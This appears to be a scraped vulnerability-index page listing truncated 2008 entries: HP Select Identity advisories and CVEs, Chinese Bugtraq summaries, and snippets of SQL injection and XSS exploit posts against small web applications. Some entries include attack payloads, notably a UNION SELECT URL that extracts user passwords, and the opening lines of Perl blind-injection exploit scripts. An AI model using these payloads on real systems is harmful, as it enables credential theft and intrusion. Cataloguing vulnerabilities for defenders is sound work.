CVE-2008-3539

Unspecified vulnerability in HP OpenView Select Identity HPSI Connectors on Windows, as used in HPSI Active Directory Connector 2.30 and earlier, HPSI SunOne Connector 1.14 and earlier, HPSI eDirectory Connector 1.12 and earlier, HPSI eTrust Connector 1.02 and earlier, HPSI OID Connector 1.02 and...

HP OpenView Select Identity Connectors本地信息泄漏漏洞

BUGTRAQ ID: 31024 CVE ID: CVE-2008-3539 CNCVE ID：CNCVE-20083539 HP OpenView Select Identity Connectors是一款身份管理解决方案包含的组件。 Windows平台下的HP OpenView Select Identity Connectors存在未明安全问题，本地攻击者可以利用漏洞获得敏感信息。 目前没有详细漏洞细节提供。 HP HPSI TOPSecret Connector 2.22.1 HP HPSI SunOne Connector 1.14 HP HPSI RACF Connecto...

[security bulletin] HPSBMA02361 SSRT080119 rev.1 - HP OpenView Select Identity Connectors running on Windows, Local Information Disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01531379 Version: 1 HPSBMA02361 SSRT080119 rev.1 - HP OpenView Select Identity Connectors running on Windows, Local Information Disclosure NOTICE: The information in this Security Bulletin should...

Spice Classifieds - cat_path SQL Injection

Spice Classifieds - catpath SQL Injection || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ Kings of injection | | // | | |...

phpBazar 2.0.2 (adid) Remote SQL Injection Vulnerability

No description provided by source. phpBazar SQL Injection Vulnerability all versions by: e.wiZz! info: Bosnian Idiot FTW! In the wild.... Script site : http://www.smartisoft.com/ Vulnerability: http://inthewild.com/INSTALL PATH/classified.php?catid=x&subcatid=x&adid=x SQL INJECTION PoC on demo...

pars4u-sqlxss.txt

!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " \n"; print " Pars4u Videosharing V1 Blind SQL Injection Exploit \n"; print " \n"; print " categoriesportal.php catid \n"; print "...

Unfixed XSS vulnerability at www.draugi.lv

Security researcher loxaXcracker, has submitted on 16/08/2008 a cross-site-scripting XSS vulnerability affecting www.draugi.lv, which at the time of submission ranked 3001016 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 20/09/2008. It is...

OpenImpro 1.1 (image.php id) SQL Injection Vulnerability

No description provided by source. OpenImpro 1.1id Sql Injection Vulnerability Author: nuclear script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip exploit: target.com/image.php?id=-1 union select 1,2,concatfirstname,0x3a,lastname,0x3a,password,4,5,6 from imperson -- Description:...

Joomla! Component EZ Store Remote - Blind SQL Injection

!/usr/bin/perl Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid." use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " \n"; print " Joomla Component EZ Store Blind SQL Injection Exploit \n"; print " Author:His0k4 ALGERIAN HaCkeR \n"; print " \n"; print "...

Scripts24 iPost 1.0.1 (id) Remote SQL Injection Vulnerability

No description provided by source. Viva IslaM Viva IslaM Remote SQL Injection Vulnerability iPOST go.php action www.scripts24.com AuTh0r : Mr.SQL H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM Email : [email protected] SYRIAN Arab HACkErS -: Exploite :- www.Target.com/go.php?action=report&id= Real id her...

getacoder-sql.txt

|| | | Getacoder Clone Script sbprotype Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangelg85atYahooDoTcom | | | | | | | | script :...

DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " Viva IslaMe Viva IslaMe \n"; print " DigiLeave V1.2Blind SQL Injection Exploit \n"; print " infobook.asp bookid \n"; print " Author: Mr.SQL \n"; print " EMAIL : [email protected] \n...

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " Viva IslaMe Viva IslaMe \n"; print " MojoJobs Blind SQL Injection Exploit \n"; print " mojoJobs.cgi mojo \n"; print " Author: Mr.SQL \n"; print " EMAIL : [email protected] \n"; prin...

YouTube Blog多个输入验证漏洞

BUGTRAQ ID: 30345 CNCAN ID：CNCAN-2008072304 YouTube Blog是一款基于PHP的博客程序。 YouTube Blog不正确处理用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意代码或获得目标用户敏感信息。 todos.php脚本对'id'参数缺少过滤，可导致SQL注入攻击。 mensaje.php脚本对'm'参数缺少过滤，可导致跨站脚本攻击。 'cuenta/cuerpo.php'对'basearchivo'参数缺少过滤，可导致远程文件包含，以WEB权限执行任意代码。 Carlos Desseno YouTube Blog 0.1...

phpfootball-sql.txt

Viva IslaM Viva IslaM Remote SQL injection Vulnerability PHPFootball 1.6 show.php dbtable AuTh0r : Mr.SQL H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f Email : [email protected] SYRIAN Arab HACkErS -: Exploite :-...

HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================== HRS Multi picturepicbv.asp key Blind SQL Injection Exploit ============================================================== !/usr/bin/perl use LWP::UserAgent; use Getopt::Long;...

HRS Multi - 'key' Blind SQL Injection

!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " Viva IslaMe Viva IslaMe \n"; print " HRS Multi Blind SQL Injection Exploit \n"; print " picturepicbv.asp key \n"; print " Author: Mr.SQL \n"; print " EMAIL : [email protected] \n"; print " \n"; print " -::...

HPSBMA02346 SSRT080097 rev.2 - HP Select Identity Active Directory Bidirectional LDAP Connector, Remote Unauthorized Access

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01502023 Version: 2 HPSBMA02346 SSRT080097 rev.2 - HP Select Identity Active Directory Bidirectional LDAP Connector, Remote Unauthorized Access NOTICE: The information in this Security Bulletin...

HP Select Identity unauthorized access

Unauthorized access via Active Directory Bidirectional LDAP Connector...

CVE-2008-1665

Multiple unspecified vulnerabilities in HP Select Identity HPSI Active Directory Bidirectional LDAP Connector 2.20, 2.20.001, 2.20.002, and 2.30 allow remote attackers to execute arbitrary code via unspecified vectors...